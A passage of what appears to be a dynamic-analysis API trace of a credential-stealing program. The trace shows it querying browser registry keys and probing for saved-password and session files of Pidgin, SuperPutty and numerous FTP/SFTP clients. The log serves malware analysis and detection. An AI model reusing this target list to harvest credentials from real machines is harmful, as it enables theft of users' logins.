pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox86", pszValue="RootDir", pdwType=0x0, pvData=0x75a488, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x75a488, pcbData=0x19fba4*=0x104) returned 0x2 [0237.719] GetProcessHeap () returned 0x740000 [0237.719] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0237.719] GetProcessHeap () returned 0x740000 [0237.719] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75a488 [0237.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0237.720] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox", pszValue="Path", pdwType=0x0, pvData=0x75a488, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x75a488, pcbData=0x19fba4*=0x104) returned 0x2 [0237.721] GetProcessHeap () returned 0x740000 [0237.721] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0237.721] GetProcessHeap () returned 0x740000 [0237.721] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75a488 [0237.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0237.722] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Pale Moon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x75a488, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x75a488, pcbData=0x19fba4*=0x104) returned 0x2 [0237.722] GetProcessHeap () returned 0x740000 [0237.722] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0237.722] GetProcessHeap () returned 0x740000 [0237.722] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75a488 [0237.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0237.723] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Waterfox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x75a488, pcbData=0x19fb90*=0x104 | out: pdwType=0x0, pvData=0x75a488, pcbData=0x19fb90*=0x104) returned 0x2 [0237.724] GetProcessHeap () returned 0x740000 [0237.724] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0238.475] GetProcessHeap () returned 0x740000 [0238.475] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x75acb0 [0238.475] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.476] wvsprintfW (in: param_1=0x75acb0, param_2="%s\\.purple\\accounts.xml", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 58 [0238.477] GetProcessHeap () returned 0x740000 [0238.477] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x78) returned 0x757818 [0238.477] GetProcessHeap () returned 0x740000 [0238.477] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75acb0 | out: hHeap=0x740000) returned 1 [0238.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0238.478] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 0 [0238.478] GetProcessHeap () returned 0x740000 [0238.479] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757818 | out: hHeap=0x740000) returned 1 [0238.723] GetProcessHeap () returned 0x740000 [0238.723] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0238.724] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0238.725] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0238.726] GetProcessHeap () returned 0x740000 [0238.726] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5a) returned 0x75b4b8 [0238.727] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.728] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\SuperPutty", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 42 [0238.728] GetProcessHeap () returned 0x740000 [0238.728] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a698 [0238.728] GetProcessHeap () returned 0x740000 [0238.729] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0238.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0238.730] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 0 [0238.731] GetProcessHeap () returned 0x740000 [0238.731] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0238.731] GetProcessHeap () returned 0x740000 [0238.731] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0238.954] GetProcessHeap () returned 0x740000 [0238.955] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0238.955] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0238.956] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0238.956] GetProcessHeap () returned 0x740000 [0238.956] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f70) returned 0x75b4b8 [0238.957] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.958] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\FTPShell\\ftpshell.fsi", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 44 [0238.958] GetProcessHeap () returned 0x740000 [0238.958] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x75a698 [0238.958] GetProcessHeap () returned 0x740000 [0238.959] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0238.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0238.960] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 0 [0238.960] GetProcessHeap () returned 0x740000 [0238.960] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0238.961] GetProcessHeap () returned 0x740000 [0238.962] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0238.962] GetProcessHeap () returned 0x740000 [0238.962] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f9a) returned 0x75b4b8 [0238.962] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.963] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 80 [0238.963] GetProcessHeap () returned 0x740000 [0238.963] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa4) returned 0x75a488 [0238.963] GetProcessHeap () returned 0x740000 [0238.964] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0238.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0238.965] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 0 [0238.965] GetProcessHeap () returned 0x740000 [0238.965] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0238.965] GetProcessHeap () returned 0x740000 [0238.965] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0238.966] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0238.967] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0238.967] GetProcessHeap () returned 0x740000 [0238.967] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f74) returned 0x75b4b8 [0238.968] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.968] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\oZone3D\\MyFTP\\myftp.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 46 [0238.969] GetProcessHeap () returned 0x740000 [0238.969] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x75a698 [0238.969] GetProcessHeap () returned 0x740000 [0238.969] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0238.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0238.970] PathFileExistsW (pszPath="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 0 [0238.971] GetProcessHeap () returned 0x740000 [0238.971] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0238.971] GetProcessHeap () returned 0x740000 [0238.973] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0238.973] GetProcessHeap () returned 0x740000 [0238.973] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x75b4b8 [0238.974] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.975] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\FTPBox\\profiles.conf", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 58 [0238.975] GetProcessHeap () returned 0x740000 [0238.975] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x78) returned 0x757b18 [0238.975] GetProcessHeap () returned 0x740000 [0238.975] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0238.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0238.976] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 0 [0238.977] GetProcessHeap () returned 0x740000 [0238.977] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757b18 | out: hHeap=0x740000) returned 1 [0238.977] GetProcessHeap () returned 0x740000 [0238.977] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0238.978] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0238.978] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0238.978] GetProcessHeap () returned 0x740000 [0238.978] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f94) returned 0x75b4b8 [0238.979] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.979] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\Sherrod Computers\\sherrod FTP\\favorites", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 62 [0238.979] GetProcessHeap () returned 0x740000 [0238.979] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75a698 [0238.980] GetProcessHeap () returned 0x740000 [0238.980] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0238.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0238.981] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 0 [0238.981] GetProcessHeap () returned 0x740000 [0238.981] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0238.981] GetProcessHeap () returned 0x740000 [0238.982] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0238.982] GetProcessHeap () returned 0x740000 [0238.982] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0238.983] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0238.983] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0238.983] GetProcessHeap () returned 0x740000 [0238.983] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f68) returned 0x75b4b8 [0238.984] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.984] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 40 [0238.984] GetProcessHeap () returned 0x740000 [0238.984] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x54) returned 0x75a698 [0238.985] GetProcessHeap () returned 0x740000 [0238.985] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0238.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0238.986] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 0 [0238.986] GetProcessHeap () returned 0x740000 [0238.986] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0238.986] GetProcessHeap () returned 0x740000 [0238.987] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0238.987] GetProcessHeap () returned 0x740000 [0238.987] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0238.988] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0238.989] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0238.989] GetProcessHeap () returned 0x740000 [0238.989] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f82) returned 0x75b4b8 [0238.990] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0238.991] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\NexusFile\\userdata\\ftpsite.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 53 [0238.991] GetProcessHeap () returned 0x740000 [0238.991] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6e) returned 0x75a698 [0238.991] GetProcessHeap () returned 0x740000 [0238.992] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0241.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0241.160] PathFileExistsW (pszPath="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 0 [0241.161] GetProcessHeap () returned 0x740000 [0241.161] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0241.161] GetProcessHeap () returned 0x740000 [0241.162] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0241.162] GetProcessHeap () returned 0x740000 [0241.162] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f70) returned 0x75b4b8 [0241.162] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0241.163] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\NexusFile\\ftpsite.ini", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 59 [0241.163] GetProcessHeap () returned 0x740000 [0241.163] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75a488 [0241.163] GetProcessHeap () returned 0x740000 [0241.164] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0241.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0241.165] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 0 [0241.165] GetProcessHeap () returned 0x740000 [0241.165] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0241.165] GetProcessHeap () returned 0x740000 [0241.165] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0241.166] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0241.202] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0241.202] GetProcessHeap () returned 0x740000 [0241.202] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f74) returned 0x75b4b8 [0241.203] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0241.204] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 55 [0241.204] GetProcessHeap () returned 0x740000 [0241.204] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757098 [0241.204] GetProcessHeap () returned 0x740000 [0241.205] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0241.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0241.206] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 0 [0241.206] GetProcessHeap () returned 0x740000 [0241.207] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0241.207] GetProcessHeap () returned 0x740000 [0241.207] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757098 | out: hHeap=0x740000) returned 1 [0241.207] GetProcessHeap () returned 0x740000 [0241.207] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0241.208] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0241.208] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0241.208] GetProcessHeap () returned 0x740000 [0241.208] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f74) returned 0x75b4b8 [0241.209] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0241.209] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 61 [0241.209] GetProcessHeap () returned 0x740000 [0241.209] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7e) returned 0x75a698 [0241.209] GetProcessHeap () returned 0x740000 [0241.210] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0241.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0241.211] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 0 [0241.211] GetProcessHeap () returned 0x740000 [0241.211] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0241.212] GetProcessHeap () returned 0x740000 [0241.212] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0243.715] GetProcessHeap () returned 0x740000 [0243.715] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0243.717] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0243.717] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0243.718] GetProcessHeap () returned 0x740000 [0243.718] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x75b4b8 [0243.718] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.719] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\EasyFTP\\data", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\EasyFTP\\data") returned 35 [0243.719] GetProcessHeap () returned 0x740000 [0243.719] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4a) returned 0x75a698 [0243.719] GetProcessHeap () returned 0x740000 [0243.720] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.721] PathFileExistsW (pszPath="C:\\Program Files (x86)\\EasyFTP\\data") returned 0 [0243.721] GetProcessHeap () returned 0x740000 [0243.722] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.722] GetProcessHeap () returned 0x740000 [0243.722] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0243.722] GetProcessHeap () returned 0x740000 [0243.722] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75a488 [0243.722] GetProcessHeap () returned 0x740000 [0243.722] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b908 [0243.722] GetProcessHeap () returned 0x740000 [0243.722] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75b4b8 [0243.724] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0243.724] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75b4b8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0243.724] GetProcessHeap () returned 0x740000 [0243.725] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x75b6c8 [0243.725] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.726] wvsprintfW (in: param_1=0x75b6c8, param_2="%s\\SftpNetDrive", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 50 [0243.726] GetProcessHeap () returned 0x740000 [0243.726] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x68) returned 0x75a878 [0243.727] GetProcessHeap () returned 0x740000 [0243.727] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c8 | out: hHeap=0x740000) returned 1 [0243.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.728] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 0 [0243.729] GetProcessHeap () returned 0x740000 [0243.729] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.729] GetProcessHeap () returned 0x740000 [0243.729] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a878 | out: hHeap=0x740000) returned 1 [0243.729] GetProcessHeap () returned 0x740000 [0243.730] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.730] GetProcessHeap () returned 0x740000 [0243.730] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b908 | out: hHeap=0x740000) returned 1 [0243.730] GetProcessHeap () returned 0x740000 [0243.730] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0243.731] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.732] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 42 [0243.732] GetProcessHeap () returned 0x740000 [0243.732] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a488 [0243.732] GetProcessHeap () returned 0x740000 [0243.733] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.734] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 0 [0243.734] GetProcessHeap () returned 0x740000 [0243.735] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.770] GetProcessHeap () returned 0x740000 [0243.770] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.771] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.772] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 63 [0243.772] GetProcessHeap () returned 0x740000 [0243.772] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0243.772] GetProcessHeap () returned 0x740000 [0243.773] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.774] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0243.774] GetProcessHeap () returned 0x740000 [0243.775] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.775] GetProcessHeap () returned 0x740000 [0243.775] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0243.776] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.776] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0243.777] GetProcessHeap () returned 0x740000 [0243.777] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0243.777] GetProcessHeap () returned 0x740000 [0243.777] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.778] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0243.779] GetProcessHeap () returned 0x740000 [0243.779] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0243.779] GetProcessHeap () returned 0x740000 [0243.779] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0243.780] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0243.781] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 42 [0243.781] GetProcessHeap () returned 0x740000 [0243.781] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a488 [0243.781] GetProcessHeap () returned 0x740000 [0243.781] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0243.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0243.782] PathFileExistsW (pszPath="C:\\Program Files 